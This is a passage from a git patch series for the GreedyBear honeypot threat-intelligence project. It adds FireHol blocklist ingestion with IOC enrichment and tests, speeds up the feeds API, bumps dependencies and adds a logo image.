     readonly_fields = fields
     show_change_link = True
     extra = 0
@@ -49,7 +64,16 @@ class SessionInline(admin.TabularInline):
 
 @admin.register(CowrieSession)
 class CowrieSessionModelAdmin(admin.ModelAdmin):
-    list_display = ["session_id", "start_time", "duration", "login_attempt", "credentials", "command_execution", "interaction_count", "source"]
+    list_display = [
+        "session_id",
+        "start_time",
+        "duration",
+        "login_attempt",
+        "credentials",
+        "command_execution",
+        "interaction_count",
+        "source",
+    ]
     search_fields = ["source__name"]
     search_help_text = ["search for the IP address source"]
     raw_id_fields = ["source", "commands"]
@@ -82,11 +106,20 @@ class IOCModelAdmin(admin.ModelAdmin):
         "cowrie",
         "general_honeypots",
         "ip_reputation",
+        "firehol_categories",
         "asn",
         "destination_ports",
         "login_attempts",
     ]
-    list_filter = ["type", "log4j", "cowrie", "scanner", "payload_request", "ip_reputation", "asn"]
+    list_filter = [
+        "type",
+        "log4j",
+        "cowrie",
+        "scanner",
+        "payload_request",
+        "ip_reputation",
+        "asn",
+    ]
     search_fields = ["name", "related_ioc__name"]
     search_help_text = ["search for the IP address source"]
     raw_id_fields = ["related_ioc"]
diff --git a/greedybear/celery.py b/greedybear/celery.py
index 0e9847e5..34311df0 100644
--- a/greedybear/celery.py
+++ b/greedybear/celery.py
@@ -112,4 +112,9 @@ def setup_loggers(*args, **kwargs):
         "schedule": crontab(hour=4, minute=3, day_of_week=6),
         "options": {"queue": "default"},
     },
+    "extract_firehol_lists": {
+        "task": "greedybear.tasks.extract_firehol_lists",
+        "schedule": crontab(hour=4, minute=15, day_of_week=0),
+        "options": {"queue": "default"},
+    },
 }
diff --git a/greedybear/cronjobs/extraction/utils.py b/greedybear/cronjobs/extraction/utils.py
index 118468b5..0d64010d 100644
--- a/greedybear/cronjobs/extraction/utils.py
+++ b/greedybear/cronjobs/extraction/utils.py
@@ -1,13 +1,13 @@
 from collections import defaultdict
 from datetime import datetime
-from ipaddress import IPv4Address, ip_address
+from ipaddress import IPv4Address, ip_address, ip_network
 from logging import Logger
 from urllib.parse import urlparse
 
 import requests
 from django.conf import settings
 from greedybear.consts import DOMAIN, IP
-from greedybear.models import IOC, MassScanner, WhatsMyIPDomain
+from greedybear.models import IOC, FireHolList, MassScanner, WhatsMyIPDomain
 
 
 def is_whatsmyip_domain(domain: str) -> bool:
@@ -50,11 +50,47 @@ def correct_ip_reputation(ip: str, ip_reputation: str) -> str:
     return ip_reputation
 
 
+def get_firehol_categories(ip: str, extracted_ip) -> list[str]:
+    """
+    Get FireHol categories for an IP address.
+    Checks both exact IP matches (for .ipset files) and network range
+    membership (for .netset files with CIDR notation).
+
+    Args:
+        ip: IP address string.
+        extracted_ip: Parsed IP address object from ipaddress library.
+
+    Returns:
+        List of FireHol source categories.
+    """
+    firehol_categories = []
+
+    # First check for exact IP match (for .ipset files)
+    exact_matches = FireHolList.objects.filter(ip_address=ip).values_list("source", flat=True)
+    firehol_categories.extend(exact_matches)
+
+    # Then check if IP is within any network ranges (for .netset files)
+    # Only query entries that contain '/' (CIDR notation)
+    network_entries = FireHolList.objects.filter(ip_address__contains="/")
+    for entry in network_entries:
+        try:
+            network_range = ip_network(entry.ip_address, strict=False)
+            if extracted_ip in network_range and entry.source not in firehol_categories:
+                firehol_categories.append(entry.source)
+        except (ValueError, IndexError):
+            # Not a valid network range, skip
+            continue
+
+    return firehol_categories
+
+
 def iocs_from_hits(hits: list[dict]) -> list[IOC]:
     """
     Convert Elasticsearch hits into IOC objects.
     Groups hits by source IP, filters out non-global addresses, and
     constructs IOC objects with aggregated data.
+    Enriches IOCs with FireHol categories at creation time to ensure
+    only fresh data is used.
 
     Args:
         hits: List of Elasticsearch hit dictionaries.
@@ -72,6 +108,8 @@ def iocs_from_hits(hits: list[dict]) -> list[IOC]:
         if extracted_ip.is_loopback or extracted_ip.is_private or extracted_ip.is_multicast or extracted_ip.is_link_local or extracted_ip.is_reserved:
             continue
 
+        firehol_categories = get_firehol_categories(ip, extracted_ip)
+
         ioc = IOC(
             name=ip,
             type=get_ioc_type(ip),
@@ -80,6 +118,7 @@ def iocs_from_hits(hits: list[dict]) -> list[IOC]:
             asn=hits[0].get("geoip", {}).get("asn"),
             destination_ports=sorted(set(dest_ports)),
             login_attempts=len(hits) if hits[0].get("type", "") == "Heralding" else 0,
+            firehol_categories=firehol_categories,
         )
         timestamps = [hit["@timestamp"] for hit in hits if "@timestamp" in hit]
         if timestamps:
diff --git a/greedybear/cronjobs/firehol.py b/greedybear/cronjobs/firehol.py
new file mode 100644
index 00000000..a9b5b54a
--- /dev/null
+++ b/greedybear/cronjobs/firehol.py
@@ -0,0 +1,56 @@
+import requests
+from greedybear.cronjobs.base import Cronjob
+from greedybear.models import IOC, FireHolList
+
+
+class FireHolCron(Cronjob):
+    def run(self) -> None:
+        base_path = "https://raw.githubusercontent.com/firehol/blocklist-ipsets/master"
+        sources = {
+            "blocklist_de": f"{base_path}/blocklist_de.ipset",
+            "greensnow": f"{base_path}/greensnow.ipset",
+            "bruteforceblocker": f"{base_path}/bruteforceblocker.ipset",
+            "dshield": f"{base_path}/dshield.netset",
+        }
+
+        for source, url in sources.items():
+            self.log.info(f"Processing {source} from {url}")
+            try:
+                try:
+                    response = requests.get(url, timeout=60)
+                    response.raise_for_status()
+                except requests.RequestException as e:
+                    self.log.error(f"Network error fetching {source}: {e}")
+                    continue
+
+                lines = response.text.splitlines()
+                for line in lines:
+                    line = line.strip()
+                    if not line or line.startswith("#"):
+                        continue
+
+                    # FireHol .ipset and .netset files contain IPs or CIDRs, one per line
+                    # Comments (lines starting with #) are filtered out above
+
+                    try:
+                        FireHolList.objects.get(ip_address=line, source=source)
+                    except FireHolList.DoesNotExist:
+                        FireHolList(ip_address=line, source=source).save()
+
+            except Exception as e:
+                self.log.exception(f"Unexpected error processing {source}: {e}")
+
+        # Clean up old FireHolList entries
+        self._cleanup_old_entries()
+
+    def _cleanup_old_entries(self):
+        """
+        Delete FireHolList entries older than 30 days to keep database clean.
+        """
+        from datetime import datetime, timedelta
+
+        cutoff_date = datetime.now() - timedelta(days=30)
+        deleted_count, _ = FireHolList.objects.filter(added__lt=cutoff_date).delete()
+
+        if deleted_count > 0:
+            self.log.info(f"Cleaned up {deleted_count} old FireHolList entries")
diff --git a/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
new file mode 100644
index 00000000..920dd0a6
--- /dev/null
+++ b/greedybear/migrations/0024_ioc_firehol_categories_alter_statistics_view_and_more.py
@@ -0,0 +1,46 @@
+# Generated by Django 5.2.8 on 2025-12-22 11:24
+
+import datetime
+import django.contrib.postgres.fields
+from django.db import migrations, models
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0023_rename_massscanners_massscanner_and_more"),
+    ]
+
+    operations = [
+        migrations.AddField(
+            model_name="ioc",
+            name="firehol_categories",
+            field=django.contrib.postgres.fields.ArrayField(base_field=models.CharField(blank=True, max_length=64), blank=True, default=list, size=None),
+        ),
+        migrations.AlterField(
+            model_name="statistics",
+            name="view",
+            field=models.CharField(
+                choices=[
+                    ("feeds", "Feeds View"),
+                    ("enrichment", "Enrichment View"),
+                    ("command sequence", "Command Sequence View"),
+                    ("cowrie session", "Cowrie Session View"),
+                ],
+                default="feeds",
+                max_length=32,
+            ),
+        ),
+        migrations.CreateModel(
+            name="FireHolList",
+            fields=[
+                ("id", models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name="ID")),
+                ("ip_address", models.CharField(max_length=256)),
+                ("added", models.DateTimeField(default=datetime.datetime.now)),
+                ("source", models.CharField(blank=True, max_length=64, null=True)),
+            ],
+            options={
+                "indexes": [models.Index(fields=["ip_address"], name="greedybear__ip_addr_e01f2f_idx")],
+            },
+        ),
+    ]
diff --git a/greedybear/migrations/0025_merge_20251223_2100.py b/greedybear/migrations/0025_merge_20251223_2100.py
new file mode 100644
index 00000000..583eb4b1
--- /dev/null
+++ b/greedybear/migrations/0025_merge_20251223_2100.py
@@ -0,0 +1,13 @@
+# Generated by Django 5.2.8 on 2025-12-23 21:00
+
+from django.db import migrations
+
+
+class Migration(migrations.Migration):
+
+    dependencies = [
+        ("greedybear", "0024_ioc_firehol_categories_alter_statistics_view_and_more"),
+        ("greedybear", "0023_rename_massscanners_massscanner_and_more"),
+    ]
+
+    operations = []
diff --git a/greedybear/models.py b/greedybear/models.py
index 348d3956..09990f73 100644
--- a/greedybear/models.py
+++ b/greedybear/models.py
@@ -30,6 +30,17 @@ def __str__(self):
         return self.name
 
 
+class FireHolList(models.Model):
+    ip_address = models.CharField(max_length=256, blank=False)
+    added = models.DateTimeField(blank=False, default=datetime.now)
+    source = models.CharField(max_length=64, blank=True, null=True)
+
+    class Meta:
+        indexes = [
+            models.Index(fields=["ip_address"]),
+        ]
+
+
 class IOC(models.Model):
     name = models.CharField(max_length=256, blank=False)
     type = models.CharField(max_length=32, blank=False, choices=iocType.choices)
@@ -48,6 +59,7 @@ class IOC(models.Model):
     related_ioc = models.ManyToManyField("self", blank=True, symmetrical=True)
     related_urls = pg_fields.ArrayField(models.CharField(max_length=900, blank=True), blank=True, default=list)
     ip_reputation = models.CharField(max_length=32, blank=True)
+    firehol_categories = pg_fields.ArrayField(models.CharField(max_length=64, blank=True), blank=True, default=list)
     asn = models.IntegerField(blank=True, null=True)
     destination_ports = pg_fields.ArrayField(models.IntegerField(), blank=False, null=False, default=list)
     login_attempts = models.IntegerField(blank=False, null=False, default=0)
diff --git a/greedybear/tasks.py b/greedybear/tasks.py
index 8b652e24..405d8403 100644
--- a/greedybear/tasks.py
+++ b/greedybear/tasks.py
@@ -69,3 +69,10 @@ def get_whatsmyip():
     from greedybear.cronjobs.whatsmyip import WhatsMyIPCron
 
     WhatsMyIPCron().execute()
+
+
+@shared_task()
+def extract_firehol_lists():
+    from greedybear.cronjobs.firehol import FireHolCron
+
+    FireHolCron().execute()
diff --git a/tests/greedybear/cronjobs/test_firehol.py b/tests/greedybear/cronjobs/test_firehol.py
new file mode 100644
index 00000000..7264f48e
--- /dev/null
+++ b/tests/greedybear/cronjobs/test_firehol.py
@@ -0,0 +1,59 @@
+from unittest.mock import MagicMock, patch
+
+from greedybear.cronjobs.firehol import FireHolCron
+from greedybear.models import IOC, FireHolList
+from tests import CustomTestCase
+
+
+class FireHolCronTestCase(CustomTestCase):
+    @patch("greedybear.cronjobs.firehol.requests.get")
+    def test_run(self, mock_get):
+        # Setup mock responses
+        mock_response_blocklist_de = MagicMock()
+        mock_response_blocklist_de.status_code = 200
+        mock_response_blocklist_de.text = "# blocklist_de\n1.1.1.1\n2.2.2.2"
+
+        mock_response_greensnow = MagicMock()
+        mock_response_greensnow.status_code = 200
+        mock_response_greensnow.text = "# greensnow\n3.3.3.3"
+
+        mock_response_bruteforceblocker = MagicMock()
+        mock_response_bruteforceblocker.status_code = 200
+        mock_response_bruteforceblocker.text = "# bruteforceblocker\n1.1.1.1"
+
+        mock_response_dshield = MagicMock()
+        mock_response_dshield.status_code = 200
+        mock_response_dshield.text = "# dshield\n4.4.4.0/24"
+
+        # Side effect for multiple calls
+        def side_effect(url, timeout):
+            if "blocklist_de" in url:
+                return mock_response_blocklist_de
+            elif "greensnow" in url:
+                return mock_response_greensnow
+            elif "bruteforceblocker" in url:
+                return mock_response_bruteforceblocker
+            elif "dshield" in url:
+                return mock_response_dshield
+            return MagicMock(status_code=404)
+
+        mock_get.side_effect = side_effect
+
+        # Run the cronjob
+        cronjob = FireHolCron()
+        cronjob.execute()
+
+        # Check FireHolList entries were created
+        self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="blocklist_de").exists())
+        self.assertTrue(FireHolList.objects.filter(ip_address="2.2.2.2", source="blocklist_de").exists())
+        self.assertTrue(FireHolList.objects.filter(ip_address="3.3.3.3", source="greensnow").exists())
+        self.assertTrue(FireHolList.objects.filter(ip_address="1.1.1.1", source="bruteforceblocker").exists())
+        self.assertTrue(FireHolList.objects.filter(ip_address="4.4.4.0/24", source="dshield").exists())
+
+        # Verify FireHolList data is available for IOC enrichment at creation time
+        # (Note: Enrichment now happens in iocs_from_hits during IOC creation, not here)
+        firehol_entries = FireHolList.objects.filter(ip_address="1.1.1.1")
+        self.assertEqual(firehol_entries.count(), 2)
+        sources = list(firehol_entries.values_list("source", flat=True))
+        self.assertIn("blocklist_de", sources)
+        self.assertIn("bruteforceblocker", sources)
diff --git a/tests/test_extraction_utils.py b/tests/test_extraction_utils.py
index 133f0945..9e1e98a9 100644
--- a/tests/test_extraction_utils.py
+++ b/tests/test_extraction_utils.py
@@ -3,7 +3,7 @@
 
 from greedybear.consts import DOMAIN, IP
 from greedybear.cronjobs.extraction.utils import correct_ip_reputation, get_ioc_type, iocs_from_hits, is_whatsmyip_domain, threatfox_submission
-from greedybear.models import MassScanner, WhatsMyIPDomain
+from greedybear.models import FireHolList, MassScanner, WhatsMyIPDomain
 
 from . import CustomTestCase, ExtractionTestCase
 
@@ -228,6 +228,64 @@ def test_empty_hits_returns_empty_list(self):
         iocs = iocs_from_hits([])
         self.assertEqual(iocs, [])
 
+    def test_firehol_enrichment_exact_ip_match(self):
+        """Test that IOCs get FireHol categories for exact IP matches (.ipset files)"""
+        FireHolList.objects.create(ip_address="8.8.8.8", source="blocklist_de")
+        FireHolList.objects.create(ip_address="8.8.8.8", source="greensnow")
+
+        hits = [self._create_hit(src_ip="8.8.8.8")]
+        iocs = iocs_from_hits(hits)
+
+        self.assertEqual(len(iocs), 1)
+        self.assertIn("blocklist_de", iocs[0].firehol_categories)
+        self.assertIn("greensnow", iocs[0].firehol_categories)
+        self.assertEqual(len(iocs[0].firehol_categories), 2)
+
+    def test_firehol_enrichment_network_range_match(self):
+        """Test that IOCs get FireHol categories when IP is within a CIDR range (.netset files)"""
+        FireHolList.objects.create(ip_address="8.8.8.0/24", source="dshield")
+
+        hits = [self._create_hit(src_ip="8.8.8.100")]
+        iocs = iocs_from_hits(hits)
+
+        self.assertEqual(len(iocs), 1)
+        self.assertIn("dshield", iocs[0].firehol_categories)
+
+    def test_firehol_enrichment_no_match(self):
+        """Test that IOCs have empty FireHol categories when there's no match"""
+        FireHolList.objects.create(ip_address="1.1.1.1", source="blocklist_de")
+        FireHolList.objects.create(ip_address="9.9.9.0/24", source="dshield")
+
+        hits = [self._create_hit(src_ip="8.8.8.8")]
+        iocs = iocs_from_hits(hits)
+
+        self.assertEqual(len(iocs), 1)
+        self.assertEqual(iocs[0].firehol_categories, [])
+
+    def test_firehol_enrichment_mixed_match(self):
+        """Test FireHol enrichment with both exact match and network range match"""
+        FireHolList.objects.create(ip_address="8.8.8.8", source="blocklist_de")
+        FireHolList.objects.create(ip_address="8.8.0.0/16", source="dshield")
+
+        hits = [self._create_hit(src_ip="8.8.8.8")]
+        iocs = iocs_from_hits(hits)
+
+        self.assertEqual(len(iocs), 1)
+        self.assertIn("blocklist_de", iocs[0].firehol_categories)
+        self.assertIn("dshield", iocs[0].firehol_categories)
+
+    def test_firehol_enrichment_deduplicates_sources(self):
+        """Test that duplicate sources are not added"""
+        FireHolList.objects.create(ip_address="8.8.8.8", source="blocklist_de")
+        FireHolList.objects.create(ip_address="8.8.0.0/16", source="blocklist_de")
+
+        hits = [self._create_hit(src_ip="8.8.8.8")]
+        iocs = iocs_from_hits(hits)
+
+        self.assertEqual(len(iocs), 1)
+        # Should only have one instance of blocklist_de
+        self.assertEqual(iocs[0].firehol_categories.count("blocklist_de"), 1)
+
 
 class ThreatfoxSubmissionTestCase(ExtractionTestCase):
     def setUp(self):
diff --git a/tests/test_serializers.py b/tests/test_serializers.py
index f78ebc0f..9d5129cf 100644
--- a/tests/test_serializers.py
+++ b/tests/test_serializers.py
@@ -115,6 +115,7 @@ def test_valid_fields(self):
                 "attack_count": "5",
                 "interaction_count": "50",
                 "ip_reputation": "known attacker",
+                "firehol_categories": [],
                 "asn": "8400",
                 "destination_port_count": "14",
                 "login_attempts": "0",

From 370c5e4a59de53deb4205cf5b83e152a702e5915 Mon Sep 17 00:00:00 2001
From: Krishna Awasthi <140143710+opbot-xd@users.noreply.github.com>
Date: Wed, 31 Dec 2025 15:47:06 +0530
Subject: [PATCH 18/75] Optimize API Performance: Remove redundant
 serialization in feeds_response. Closes #629 (#662)

* Optimize API performance by removing redundant serialization in feeds_response

- Remove per-item FeedsResponseSerializer instantiation and validation
- Directly append data_ dictionary to json_list (50-90x speedup)
- Benchmarking shows response time reduction from ~1.8s to ~0.03s for 5000 IOCs
- All existing tests pass (78/78 in test_views, 4/4 in test_serializers)
- API contract remains unchanged

Closes #629

* Remove unused FeedsResponseSerializer import

* Add documentation to FeedsResponseSerializer explaining why it's retained

- Keep serializer as schema definition and documentation
- Add comprehensive docstring explaining performance optimization context
- Clarifies serializer is not used in production but valuable for:
  * API contract documentation
  * Unit test validation
  * Future reference and potential re-enabling
  * Developer/consumer understanding of response format

Related to #629
---
 api/serializers.py | 23 +++++++++++++++++++++++
 api/views/utils.py | 14 +++-----------
 2 files changed, 26 insertions(+), 11 deletions(-)

diff --git a/api/serializers.py b/api/serializers.py
index dffa2a1a..63aa694a 100644
--- a/api/serializers.py
+++ b/api/serializers.py
@@ -118,6 +118,29 @@ def validate_ordering(self, ordering):
 
 
 class FeedsResponseSerializer(serializers.Serializer):
+    """
+    Serializer for feed response data structure.
+
+    NOTE: This serializer is currently NOT used in production code (as of #629).
+    It has been kept in the codebase for the following reasons:
+
+    1. **Documentation**: Serves as a clear schema definition for the API response contract
+    2. **Testing**: Validates the expected response structure through unit tests
+    3. **Future-proofing**: Allows easy re-enabling of validation if security requirements change
+    4. **Reference**: Useful for API consumers and developers to understand the response format
+
+    Performance Optimization Context:
+    Previously, this serializer was instantiated and validated for each IOC in the response
+    (up to 5000 times per request), causing significant overhead (~1.8s for 5000 IOCs).
+    The optimization removed this per-item validation since the data is constructed internally
+    in api/views/utils.py::feeds_response() and guaranteed to match this schema.
+
+    The response is now built directly without serializer validation, reducing response time
+    to ~0.03s (50-90x speedup) while maintaining the exact same API contract defined here.
+
+    See: #629 for benchmarking details and discussion.
+    """
+
     feed_type = serializers.ListField(child=serializers.CharField(max_length=120))
     value = serializers.CharField(max_length=256)
     scanner = serializers.BooleanField()
diff --git a/api/views/utils.py b/api/views/utils.py
index d6a15985..421d0249 100644
--- a/api/views/utils.py
+++ b/api/views/utils.py
@@ -7,7 +7,7 @@
 from ipaddress import ip_address
 
 from api.enums import Honeypots
-from api.serializers import FeedsRequestSerializer, FeedsResponseSerializer
+from api.serializers import FeedsRequestSerializer
 from django.conf import settings
 from django.contrib.postgres.aggregates import ArrayAgg
 from django.db.models import F, Q
@@ -266,16 +266,8 @@ def feeds_response(iocs, feed_params, valid_feed_types, dict_only=False, verbose
                     "destination_port_count": len(ioc["destination_ports"]),
                 }
 
-                if verbose:
-                    json_list.append(data_)
-                    continue
-
-                serializer_item = FeedsResponseSerializer(
-                    data=data_,
-                    context={"valid_feed_types": valid_feed_types},
-                )
-                serializer_item.is_valid(raise_exception=True)
-                json_list.append(serializer_item.data)
+                # Skip validation - data_ is constructed internally and matches the API contract
+                json_list.append(data_)
 
             # check if sorting the results by feed_type
             if feed_params.feed_type_sorting is not None:

From 0c08389c52e0765487e66447fbdd694ac5ff30a9 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 1 Jan 2026 13:19:15 +0100
Subject: [PATCH 19/75] Bump joblib from 1.5.2 to 1.5.3 in /requirements (#660)

Bumps [joblib](https://github.com/joblib/joblib) from 1.5.2 to 1.5.3.
- [Release notes](https://github.com/joblib/joblib/releases)
- [Changelog](https://github.com/joblib/joblib/blob/main/CHANGES.rst)
- [Commits](https://github.com/joblib/joblib/compare/1.5.2...1.5.3)

---
updated-dependencies:
- dependency-name: joblib
  dependency-version: 1.5.3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index df078e9b..7fde629d 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -16,7 +16,7 @@ slack-sdk==3.39.0
 uwsgitop==0.12
 uwsgi==2.0.31
 
-joblib==1.5.2
+joblib==1.5.3
 pandas==2.3.3
 scikit-learn==1.8.0
 numpy==2.3.5

From 3e163cb6c094a23465c0d03c6d0538d92b88d673 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 1 Jan 2026 13:19:29 +0100
Subject: [PATCH 20/75] Bump celery from 5.6.0 to 5.6.1 in /requirements (#658)

Bumps [celery](https://github.com/celery/celery) from 5.6.0 to 5.6.1.
- [Release notes](https://github.com/celery/celery/releases)
- [Changelog](https://github.com/celery/celery/blob/main/Changelog.rst)
- [Commits](https://github.com/celery/celery/compare/v5.6.0...v5.6.1)

---
updated-dependencies:
- dependency-name: celery
  dependency-version: 5.6.1
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 7fde629d..182271a2 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,4 +1,4 @@
-celery==5.6.0
+celery==5.6.1
 
 # if you change this, update the documentation
 elasticsearch8==8.19.2

From 2aaac102b11558155453dfee869c34b0a8c556bd Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 1 Jan 2026 13:19:46 +0100
Subject: [PATCH 21/75] Bump django from 5.2.8 to 5.2.9 in /requirements (#657)

Bumps [django](https://github.com/django/django) from 5.2.8 to 5.2.9.
- [Commits](https://github.com/django/django/compare/5.2.8...5.2.9)

---
updated-dependencies:
- dependency-name: django
  dependency-version: 5.2.9
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 182271a2..dacfce7a 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -3,7 +3,7 @@ celery==5.6.1
 # if you change this, update the documentation
 elasticsearch8==8.19.2
 
-Django==5.2.8
+Django==5.2.9
 djangorestframework==3.16.1
 django-rest-email-auth==5.0.0
 django-ses==4.5.0

From 096aded61c445e3ebaa538e3c25374b7d9d46cb0 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 1 Jan 2026 13:22:05 +0100
Subject: [PATCH 22/75] Bump numpy from 2.3.5 to 2.4.0 in /requirements (#659)

Bumps [numpy](https://github.com/numpy/numpy) from 2.3.5 to 2.4.0.
- [Release notes](https://github.com/numpy/numpy/releases)
- [Changelog](https://github.com/numpy/numpy/blob/main/doc/RELEASE_WALKTHROUGH.rst)
- [Commits](https://github.com/numpy/numpy/compare/v2.3.5...v2.4.0)

---
updated-dependencies:
- dependency-name: numpy
  dependency-version: 2.4.0
  dependency-type: direct:production
  update-type: version-update:semver-minor
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index dacfce7a..0d8aba06 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -19,5 +19,5 @@ uwsgi==2.0.31
 joblib==1.5.3
 pandas==2.3.3
 scikit-learn==1.8.0
-numpy==2.3.5
+numpy==2.4.0
 datasketch==1.8.0

From dc868f2b462a7a9ba40617eeb52d6396a28fa8ad Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 1 Jan 2026 13:23:43 +0100
Subject: [PATCH 23/75] Bump elasticsearch8 from 8.19.2 to 8.19.3 in
 /requirements (#661)

Bumps [elasticsearch8](https://github.com/elastic/elasticsearch8-py) from 8.19.2 to 8.19.3.
- [Commits](https://github.com/elastic/elasticsearch8-py/commits)

---
updated-dependencies:
- dependency-name: elasticsearch8
  dependency-version: 8.19.3
  dependency-type: direct:production
  update-type: version-update:semver-patch
...

Signed-off-by: dependabot[bot] <support@github.com>
Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com>
---
 requirements/project-requirements.txt | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/requirements/project-requirements.txt b/requirements/project-requirements.txt
index 0d8aba06..3b05f326 100644
--- a/requirements/project-requirements.txt
+++ b/requirements/project-requirements.txt
@@ -1,7 +1,7 @@
 celery==5.6.1
 
 # if you change this, update the documentation
-elasticsearch8==8.19.2
+elasticsearch8==8.19.3
 
 Django==5.2.9
 djangorestframework==3.16.1

From d35ef322d7cae972736aa2276f5aa15bed18f1bc Mon Sep 17 00:00:00 2001
From: Eshaan Gupta <146680427+Eshaan-byte@users.noreply.github.com>
Date: Fri, 2 Jan 2026 01:23:57 +1100
Subject: [PATCH 24/75] Add missing logo192.png file (#655)

Created a 192x192 pixel logo image from the existing greedybear.png
to serve as the Apple Touch Icon. This resolves the 404 error when
the frontend tries to load the missing asset.

Fixes #627
---
 frontend/public/logo192.png | Bin 0 -> 24955 bytes
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 frontend/public/logo192.png

diff --git a/frontend/public/logo192.png b/frontend/public/logo192.png
new file mode 100644
index 0000000000000000000000000000000000000000..86942b10ade214c0f3d324fcaca005d727c6d04a
GIT binary patch
literal 24955
zcmagF1zcQB(l0zS3@}Jw22CKiySqzpCj@s3I=H(8cXtB8f(9ofKyW7nm*7EyLvR>A
zo@e*n-EZ%Ee|P4b?mE@=@2c*uI^Cz|Oq806>@##CbN~SGOkPe}<0<d@>x7^@r5elj
zs81QtRYO)1P&58=@9BcvTuwt70Pvv&0D{5*fZHcl&@KSr&JF<lHUR(xGXVfXr`*r#
z!cPTfmOAoQ%E|!7CmI4k1>yjZo+#kc7XTyzApcDR0A@hqf6=x;`hUuRo@6)xPbq-%
z>2v{d{!QaO(WwzO0PsJt<xlxvB=cX%|Kt)Da5GDCwYP9Lxa(WE6S<TWIVU>@4>`TI
zjiUwJ)0F|h$<E0s$j<R}kaO@0a`Fjsa{vI~MDV|KtP}$OZEGRuU;4TVk^W8prTIT=
z;uGW$5ai$o(4~I~c`8D4lGAks09dL1I)Pp#Vjchh(xlC69XB0iB|&qz1FPv@hO&A&
zIQ>-<K-f$0iFB}ZGbQ(Ouy=G7^b(=`TSD-O{)^2<N&dHpo1F-yj<OoL6x_v<oR^iI
zm7P))ot&Ip*u}z1P(xbgpYW$E5z4o2Zcc)1Y@VK;te#w~a2IPf4gmoHHg--nPEM95
z2^LpxM>kV17DrdAe^l~6^+;Q~n!DIIx!J%S$^WX?)C}(KCPGR1m!f}t{%NO!)4vos
zy8g3OPwiv#GIe6(U}b0f-$0gLHvcy7|A+dk<o^nDv$6WW!2T-v2kh_8_=k<cPdzFq
z<zi{-26uT4hue$(KYc@(?Y|-aZt>r>DZ?#nth}X7-7H1_8hjRZj;G`G|G3dV;Qt}>
zU+BMWvHU;K|8$-IQ2q~@|3LrMErMz`UY7Pc(l!p3j;>E5Bg(<UFCfhJzZU&BR0?hn
zchPh*HMbPy<>BGt`6ui@*#C|ATbb^EDC7SZ>c5Nr1NzrE2x?fm!tLGvavm*58#hr-
zVYdH`{og2^f5Sw%*xCOH`cLkEBXs{)#D8-C8=>lAWBKIqf0-uA@lOr^$@{0gFxy{F
z{~tl{j|lsl`xIiL=uboSKjA8h&Qnox0RV^t<fSEEdjSu>qUIXRcwarnHrqD+{;F7B
z1j31A>~eXpO*|kHujn);hSf@^A}RVQh0jCs-r4)`ORtLkCV`nf`@GwvG#o@tO@Vf?
zvQ*<ylJ|J*dz70c)S!8kYFPb2;K#vo+plHUi3gDh??rEw(T~3}|8z;Vw|PX9+(Y>S
zdv2F6-?ZNha@Y*Y2TaY&Bkq49t}z@W4lRW4vW*BjD>C}FbNZ@!1PS_>5pXJpLqm@C
zhqo<!zo|P+(*U3Me)XKvExot19d(S=JqR)Sd~AwQw_?IW37Voqgmpanm+<`5B7uG0
z>3fY<7<0FPB(`?_bvq)sz}rq0;tcCn7h;t3k_bDI)8ZaJC`U)s;D{p&aT#cFbYUA0
zG}D1)z-V$U%q`oi+OlDzMjuCy8G)}$$x@n9k?t*MqMoTjzD26x$8p}3;dEAl)uN1E
zlbHT$?)MohGyfWEe8eJ5QONA6bCAw)xt*tF*|u!-tfm%6JnKP6KHj*TAs?zCD7pHv
z-k^L6{pAxs7;D(Q)nIJ|XUoF>xAg~Tx$Do5QwTRnac-aHkIbIGOWq271VgI}lC8so
zjibwvPKc{#FLf&)#*MVUa<q?^>WdvZG*QvOLI~qNZclC5MSoGJ35qntM+smXy1p6B
zTKI^G^mx_0?AWy95ar-nHePS)5jxgTX|JanrlytNaN&pW*8&Z$ifK3^p%Qr9y9fl(
